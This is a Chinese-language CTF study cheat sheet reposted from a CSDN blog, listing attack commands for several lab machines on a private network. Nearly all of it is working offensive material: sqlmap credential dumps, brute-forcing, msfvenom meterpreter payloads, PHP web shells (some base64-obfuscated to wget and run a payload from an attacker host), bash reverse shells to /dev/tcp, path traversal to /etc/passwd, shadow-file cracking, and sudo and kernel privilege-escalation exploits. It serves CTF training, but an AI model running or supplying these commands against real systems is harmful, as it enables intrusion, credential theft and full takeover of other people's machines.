CTF学习资料

这是 CTF 学习资料，如果需要视频及靶场等学习资料可加 QQ 群 1031811955
单用户模式下：按 shift 后按 e，找到 ro recovery nomodeset，将之替换为 rw single init=/bin/bash，按 ctrl+x 启动，然后执行 passwd root
扫描局域网ip、mac映射关系
netdiscover -r 192.168.1.1/24

解除端口占用
netstat -pantu
netstat -lnp|grep 4444
fuser -v -n tcp 4444
kill -9 2169

ps -a

service network restart
/etc/init.d/network restart 或者是 /etc/init.d/networking restart

service vsftpd start
/home/uftp

nc -nlvp 4444

信息探测
nmap -sV 192.168.1.3

nmap -T4 -p- 192.168.1.6

nmap -T4 -A -v 192.168.1.6

nikto -host http://192.168.1.6

dirb http://192.168.1.6

python -c "import pty;pty.spawn('/bin/bash')"

ssh [email protected]
mysql -h 192.168.1.11 -u username_here -p

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.8

set username hadi

set threads 5

set pass_file /root/桌面/common-password/hadi.txt

set verbose true

python -c "import pty;pty.spawn('/bin/bash')"

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” --tables

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” --columns

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” -C “login,password” --dump

http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php

netdiscover -r 192.168.1.1/24

clear

playsms/index.php?app=main&inc=feature_sendfromfile&op=list

<?php system('uname -a');die(); ?>.php

https://www.expolit-db.com/exipolits/42003
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==

<?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg=='));die(); ?>.php <?php system(base64_decode('Y2htb2QgNzc3IC90bXAvYQo='));die(); ?>.php <?php system(base64_decode('L3RtcC9hCg=='));die(); ?>.php

sudo perl -e "exec ’ /bin/sh’ "
bash -i

shellcd.PHP

apt-get install avws

sqlmap -u “http://192.168.1.9” --headers=“X-Forwarded-For:*” --dbs --batch

sqlmap -u url --headers=“X-Forwarded-For:*” --dbs --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog --tables --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users --columns --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users -C login,password --dump --batch

cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw > /root/桌面/shell.py

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

service apache2 start
service apache2 status

sysinfo
shell

http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
cat /etc/passwd
su togie
sudo -l

13.CTF夺旗-目录遍历(拿到www-data用户权限)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
OWASP ZAP
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fetc%2Fpasswd
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面
mv php-reverse-shell.php shell.php

<?php system("cd /tmp; wget http://192.168.1.10:8000/shell.php; chmod +x shell.php; php shell.php");?>

python -m "SimpleHTTPServer"
nc -nlvp 4444
/usr/databases/shell.php
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fusr/databases/shell.php
python -c "import pty;pty.spawn('/bin/bash')"

14.WEB安全暴力破解
http://192.168.1.12/secret/wp-login.php
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
marlinspike
python -c "import pty;pty.spawn('/bin/bash')"
su - marlinspike
sudo -l
sudo bash

15.路径遍历(提权root权限)web安全提权
uname -a
cat /etc/issue
cat /etc/*-release
cat /etc/passwd
cat /etc/shadow
cat /etc/crontab
sudo
sudo -l
cd /home
cd wordpress
ssh [email protected]
sWfCsfJSPV9H3AmQzw8
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-comman=“sh -c /bin/bash”
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action="/bin/bash"

16.web安全命令执行
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp

ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
nc -lvp 444
ssh bill@localhost sudo bash -i>& /dev/tcp/192.168.1.10/444 0>& 1
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
ssh bill@localhost sudo wget “http://192.168.1.10:8000/webshell.jsp” -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
ssh bill@localhost sudo chmod 777 /var/lib/tomcat8/webapps/ROOT/webshell.jsp

17.命令执行(使用集成工具测试)
service network start
ifconfig ens33 192.168.1.11
安装sparta
git clone https://github.com/secforce/sparta.git /opt/sparta
git clone https://github.com/elixir-lang/elixir.git
apt-get install python-elixir
apt-get install ldap-utils rwho rsh-client x11-apps finger
cd /opt/sparta
./sparta.py

/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev

cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
nc -nlvp 4444
echo ‘bash -i >& /dev/tcp/192.168.1.10/4445 0>&1’ | bash
sudo su

18.PUT上传漏洞
curl -v -X OPTIONS http://192.168.1.11/test
火狐安装RESTClient
cp /usr/share/webshells/php/php-reverse-shell.php shell.php

http://192.168.1.3/login.php
@btrisk.com

23.综合测试(高难度内核提权)WEB安全中级入侵
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u

wpscan --url http://192.168.1.6/wordpress --enumerate u

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php

searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
gcc 41458.c -o shellroot
upload /root/桌面/shellroot
chmod 777 shellroot
./shellroot



转载自blog.csdn.net/qw123456789e/article/details/104426716